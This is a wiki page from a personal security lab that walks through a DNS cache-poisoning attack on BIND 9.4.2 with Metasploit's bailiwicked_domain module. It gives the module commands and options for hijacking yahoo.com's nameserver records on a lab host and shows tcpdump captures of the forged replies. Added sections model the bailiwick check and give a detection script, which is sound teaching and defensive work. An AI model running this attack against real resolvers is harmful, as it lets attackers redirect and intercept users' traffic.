From charlesreid1

Revision as of 06:56, 26 March 2016

Searching for Exploits

Searching for exploits against the DNS service that is running, ISC BIND 9.4.2, we find the following entry: https://www.exploit-db.com/exploits/6122/

In Metasploit this is the module auxiliary/spoof/dns/bailiwicked_domain. It inserts malicious DNS records into the cache of the target DNS server.

DNS Exploit: bailiwicked domain

We can use this exploit by running:

msf > use auxiliary/spoof/dns/bailiwicked_domain

More information:

This exploit targets a fairly ubiquitous flaw in DNS implementations which allows the insertion of malicious DNS records into the cache of the target nameserver. This exploit caches a single malicious nameserver entry into the target nameserver which replaces the legitimate nameservers for the target domain. By causing the target nameserver to query for random hostnames at the target domain, the attacker can spoof a response to the target server including an answer for the query, an authority server record, and an additional record for that server, causing the target nameserver to insert the additional record into the cache. This insertion completely replaces the original nameserver records for the target domain.

To interpret:

  • Metasploit first induces the target nameserver to look up names in the target domain, and gathers information about the responses it sees (see the RECONS, SRCPORT and XIDS options below) to craft its attack.
  • Metasploit then induces the target nameserver to ask for random subdomains of the target domain, and sends forged responses that appear to come from the target domain's nameservers, hoping one is accepted before the legitimate answer arrives.
  • When the spoofing succeeds, the target nameserver accepts a forged authority (NS) record and inserts it into its DNS cache.
  • The target nameserver now holds a new NS record for the target domain, pointing at whatever nameserver was set in the Metasploit options (NEWDNS).
  • From then on, anyone querying the target nameserver for names in the target domain is sent to the attacker's nameserver, which can tamper with the request before forwarding it along.
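
As an added illustration (not code from this page or from Metasploit), here is a toy model of how a resolver that applies the bailiwick rule treats a reply shaped like the one the module description gives: it only caches records whose owner name falls under the zone it queried, and only if the reply matches the transaction ID, port and question of an outstanding query. The record contents, the fixed source port 53 and the placeholder address 192.0.2.1 are constructed assumptions; the point is that the NS record owned by the target domain passes the check even though the glue for NEWDNS does not.

```python
from dataclasses import dataclass, field
@dataclass
class RR:
    name: str    # owner name, absolute (trailing dot)
    rtype: str   # "A" or "NS"
    rdata: str

@dataclass
class Response:
    xid: int
    dport: int   # UDP port the reply is addressed to
    qname: str
    answer: list = field(default_factory=list)
    authority: list = field(default_factory=list)
    additional: list = field(default_factory=list)

def in_bailiwick(name, zone):
    """True if `name` is `zone` itself or lies below it (both absolute names)."""
    name, zone = name.lower(), zone.lower()
    return name == zone or name.endswith("." + zone)

def cacheable_records(outstanding, resp, zone):
    """Records a bailiwick-checking resolver would cache from `resp`, or None.
    `outstanding` is (xid, source port, qname) of the query the resolver sent to
    a server for `zone`; a reply must match all three. With a fixed source port
    only the 16-bit XID is unpredictable to whoever forges the reply."""
    xid, sport, qname = outstanding
    if (resp.xid, resp.dport, resp.qname.lower()) != (xid, sport, qname.lower()):
        return None
    return [rr for rr in resp.answer + resp.authority + resp.additional
            if in_bailiwick(rr.name, zone)]

# Constructed reply shaped like the module description: an answer for the random
# name, an NS record for the zone naming NEWDNS, and a glue A record for NEWDNS
# (192.0.2.1 is a documentation address standing in for the attacker's host).
FORGED = Response(
    xid=20040, dport=53, qname="pnJt2DO12GBApJy9.yahoo.com.",
    answer=[RR("pnJt2DO12GBApJy9.yahoo.com.", "A", "173.5.129.127")],
    authority=[RR("yahoo.com.", "NS", "dns01.metasploit.com.")],
    additional=[RR("dns01.metasploit.com.", "A", "192.0.2.1")])

def demo():
    """What survives the bailiwick rule once the XID and port have been guessed."""
    # Constructed: a resolver that reuses source port 53 for every query it sends.
    query = (20040, 53, "pnJt2DO12GBApJy9.yahoo.com.")
    kept = cacheable_records(query, FORGED, "yahoo.com.")
    # The out-of-bailiwick glue is dropped, but the NS record owned by yahoo.com.
    # is kept, and that alone redirects the whole zone to NEWDNS.
    return [(rr.rtype, rr.name) for rr in kept]
```

Source-port randomization widens what the forger must guess from the XID alone to the XID plus the port, which is why the post-2008 BIND fix for this class of bug was port randomization rather than a stricter bailiwick check.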

Doing It

Metasploit

We can set up the attack by setting the remote host and the various options through Metasploit.

Start by loading the exploit and showing the available options:

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > show options

Module options (auxiliary/spoof/dns/bailiwicked_domain):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     example.com      yes       The domain to hijack
   INTERFACE                   no        The name of the interface
   NEWDNS                      yes       The hostname of the replacement DNS server
   RECONS     208.67.222.222   yes       The nameserver used for reconnaissance
   RHOST                       yes       The target address
   SNAPLEN    65535            yes       The number of bytes to capture
   SRCADDR    Real             yes       The source address to use for sending the queries (Accepted: Real, Random)
   SRCPORT                     yes       The target server's source query port (0 for automatic)
   TIMEOUT    500              yes       The number of seconds to wait for new data
   TTL        33918            yes       The TTL for the malicious host entry
   XIDS       0                yes       The number of XIDs to try for each query (0 for automatic)

msf auxiliary(bailiwicked_domain) >

The default RECONS nameserver, 208.67.222.222, is an OpenDNS resolver: http://whatismyipaddress.com/ip/208.67.222.222

msf auxiliary(bailiwicked_domain) > set DOMAIN yahoo.com
DOMAIN => yahoo.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set RHOST 10.0.0.27
RHOST => 10.0.0.27
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) >

Locked and loaded.

Here is the NS record set the target returns for yahoo.com before the attack:

msf auxiliary(bailiwicked_domain) > dig +short -t ns yahoo.com @10.0.0.27
[*] exec: dig +short -t ns yahoo.com @10.0.0.27

ns6.yahoo.com.
ns1.yahoo.com.
ns4.yahoo.com.
ns5.yahoo.com.
ns2.yahoo.com.
ns3.yahoo.com.
msf auxiliary(bailiwicked_domain) >

Let's rock:

msf auxiliary(bailiwicked_domain) > run

Tcpdump

Watching in another window with tcpdump, we see a steady stream of DNS traffic: queries from morpheus (the attacking host) for random subdomains of yahoo.com, interleaved with bursts of replies to 10.0.0.27 that claim to come from each of the yahoo.com nameservers and carry consecutive transaction IDs (20040, 20041, ... 20072). The morpheus.ssh lines are SSH traffic unrelated to DNS.

# tcpdump -i eth0

[...]

23:55:27.992636 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108)
23:55:27.993049 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108)
23:55:27.993480 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108)
23:55:27.993894 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (108)
23:55:27.994786 IP morpheus.48140 > 10.0.0.27.domain: 38614+ A? pnJt2DO12GBApJy9.yahoo.com. (44)
23:55:27.995487 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.995909 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.996341 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.996721 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2421896:2426028, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132
23:55:27.996786 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2426028:2430160, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132
23:55:27.996962 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.997090 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2430160:2434292, ack 1513, win 46, options [nop,nop,TS val 64578981 ecr 902386742], length 4132
23:55:27.997216 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2434292:2438424, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132
23:55:27.997507 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2438424:2442556, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132
23:55:27.997642 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.997760 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2442556:2446688, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 4132
23:55:27.997929 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2446688:2454952, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902386742], length 8264
23:55:27.998195 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:28.000837 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], seq 2454952:2472328, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 17376
23:55:28.000880 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], seq 2472328:2492600, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 20272
23:55:28.000921 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2492600:2508844, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387138], length 16244
23:55:28.001045 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 2508844:2509476, ack 1513, win 46, options [nop,nop,TS val 64578982 ecr 902387139], length 632
23:55:28.001580 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.002006 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.002424 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.002846 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.003133 IP morpheus.ssh > 10.0.0.19.62248: Flags [.], ack 1549, win 46, options [nop,nop,TS val 64578983 ecr 902387140], length 0

[...]

23:55:28.366030 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.366489 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.366923 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.367362 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.367799 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20070*- 1/1/1 A 173.5.129.127 (110)
23:55:28.368372 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.368807 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.369263 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.369698 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.370140 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.370571 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20071*- 1/1/1 A 173.5.129.127 (110)
23:55:28.371137 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.371576 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.372018 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.372453 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.372889 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.373348 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20072*- 1/1/1 A 173.5.129.127 (110)
23:55:28.374282 IP morpheus.19248 > 10.0.0.27.domain: 32177+ A? oTdkBDSfM4iZG6.yahoo.com. (42)
23:55:28.375022 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.375462 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.375897 IP ns5.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.376339 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.376772 IP ns6.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.377226 IP ns4.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (105)
23:55:28.377782 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (105)
23:55:28.378224 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (105)
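
As an added detection example (not part of the original page and not Metasploit code), the following Python script parses tcpdump text output like the capture above and reports the indicators a defender watching a resolver would look for: queries for random-looking names under the zone, many replies to a single transaction ID from different claimed sources, replies addressed to port 0, and runs of consecutive XIDs. The sample lines are constructed from the capture above, and the random-label test is a heuristic.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the capture above (not the full capture).
SAMPLE = """\
23:55:27.994786 IP morpheus.48140 > 10.0.0.27.domain: 38614+ A? pnJt2DO12GBApJy9.yahoo.com. (44)
23:55:27.995487 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.995909 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:27.996721 IP morpheus.ssh > 10.0.0.19.62248: Flags [P.], seq 1:2, ack 1, win 46, length 4132
23:55:27.996962 IP ns3.yahoo.com.domain > 10.0.0.27.0: 20040*- 1/1/1 A 173.5.129.127 (107)
23:55:28.001580 IP ns1.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.002006 IP ns2.yahoo.com.domain > 10.0.0.27.0: 20041*- 1/1/1 A 173.5.129.127 (107)
23:55:28.374282 IP morpheus.19248 > 10.0.0.27.domain: 32177+ A? oTdkBDSfM4iZG6.yahoo.com. (42)
"""
# Query to port 53: "src.port > dst.domain: XID+ TYPE? name. (len)"
QUERY = re.compile(r"^\S+ IP \S+ > \S+\.domain: (?P<xid>\d+)\+ \S+\? (?P<qname>\S+) \(")
# Reply from port 53: "src.domain > dst.port: XID*- ans/auth/add ..."
RESP = re.compile(r"^\S+ IP (?P<src>\S+)\.domain > [\d.]+\.(?P<dport>\d+): "
                  r"(?P<xid>\d+)[*$|-]* \d+/\d+/\d+ ")

def looks_random(qname, min_len=10):
    """Heuristic: a long first label mixing upper case, lower case and digits."""
    label = qname.split(".")[0]
    mixed = label != label.lower() and label != label.upper()
    return len(label) >= min_len and mixed and any(c.isdigit() for c in label)

def analyze(text, zone):
    """Return the cache-poisoning indicators present in tcpdump output for `zone`."""
    lines = text.splitlines()
    queries = [m.groupdict() for m in map(QUERY.match, lines) if m]
    responses = [m.groupdict() for m in map(RESP.match, lines) if m]
    senders = defaultdict(set)                 # XID -> claimed source nameservers
    for r in responses:
        senders[int(r["xid"])].add(r["src"])
    xids, longest, run = sorted(senders), 0, 0
    for i, x in enumerate(xids):               # resolvers pick XIDs at random;
        run = run + 1 if i and x == xids[i - 1] + 1 else 1   # a sweep does not
        longest = max(longest, run)
    return {
        # Queries for unpredictable names under the zone force cache misses.
        "random_subdomain_queries": [q["qname"] for q in queries
                                     if q["qname"].lower().endswith("." + zone + ".")
                                     and looks_random(q["qname"])],
        # A genuine reply targets the resolver's ephemeral source port, never port 0.
        "responses_to_port_zero": sum(r["dport"] == "0" for r in responses),
        # Several "nameservers" answering one XID within milliseconds is a race.
        "xids_with_multiple_senders": {x: sorted(s) for x, s in senders.items() if len(s) > 1},
        "longest_sequential_xid_run": longest,
    }
```

Run it over `tcpdump -i eth0 -n port 53` output saved to a file; on a healthy resolver every indicator should stay at zero or empty.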

Flags